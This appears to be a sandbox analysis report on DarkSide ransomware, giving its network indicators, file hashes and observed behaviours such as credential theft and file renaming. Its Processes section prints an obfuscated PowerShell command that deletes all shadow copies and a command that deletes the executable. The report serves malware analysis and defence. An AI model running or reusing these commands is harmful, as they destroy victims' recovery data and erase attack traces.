US 172.234.222.143:443 securebestapp20.com tcp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 172.234.222.138:443 securebestapp20.com tcp
US 8.8.8.8:53 138.222.234.172.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 144.97.18.2.in-addr.arpa udp

Files

memory/3380-2-0x00007FFF76753000-0x00007FFF76755000-memory.dmp

memory/3380-3-0x000001B4EC3B0000-0x000001B4EC3D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kaueu2qb.nhz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3380-13-0x00007FFF76750000-0x00007FFF77211000-memory.dmp

memory/3380-14-0x00007FFF76750000-0x00007FFF77211000-memory.dmp

memory/3380-15-0x00007FFF76750000-0x00007FFF77211000-memory.dmp

memory/3380-18-0x00007FFF76750000-0x00007FFF77211000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71444def27770d9071039d005d0323b7
SHA1 cef8654e95495786ac9347494f4417819373427e
SHA256 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512 a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

C:\Users\Admin\README.0b553531.TXT

MD5 b58e2411168bbdbec635cf4001635db0
SHA1 c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256 652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA512 87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 10:31

Reported

2024-08-06 10:33

Platform

win7-20240729-en

Max time kernel

118s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (166) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Indicator Removal: File Deletion

defense_evasion

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f6405d07.BMP" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f6405d07.BMP" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f6405d07 C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f6405d07\ = "f6405d07" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f6405d07\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f6405d07 C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f6405d07\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f6405d07.ico" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Darkside.exe

"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 securebestapp20.com udp
US 172.234.222.138:443 securebestapp20.com tcp
US 172.234.222.143:443 securebestapp20.com tcp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 172.234.222.138:443 securebestapp20.com tcp
US 172.234.222.143:443 securebestapp20.com tcp

Files

memory/3020-5-0x000007FEF63CE000-0x000007FEF63CF000-memory.dmp

memory/3020-6-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

memory/3020-7-0x00000000027A0000-0x00000000027A8000-memory.dmp

memory/3020-8-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

memory/3020-10-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

memory/3020-11-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

memory/3020-9-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

memory/3020-12-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

memory/3020-13-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8833160dee371379190bb3c51c531062
SHA1 2b938c6773b970b033adfa23da0154baf84816d2
SHA256 bfc57b18cbcb82232dc4d2403bc6eaa189e28d3d1b987acb3ce0b22e9a8735d5
SHA512 775dfef9ea0769e74deadc61a0d816f651f6d38f7b66d50c18eb531105c86dc192042628072731c4ba3840e290f67da751efc8408425e776895d14d366f3b35a

C:\Users\Admin\README.f6405d07.TXT

MD5 b58e2411168bbdbec635cf4001635db0
SHA1 c130cd9caaaa514a6b98c1168e10d44a989d191a
SHA256 652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
SHA512 87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a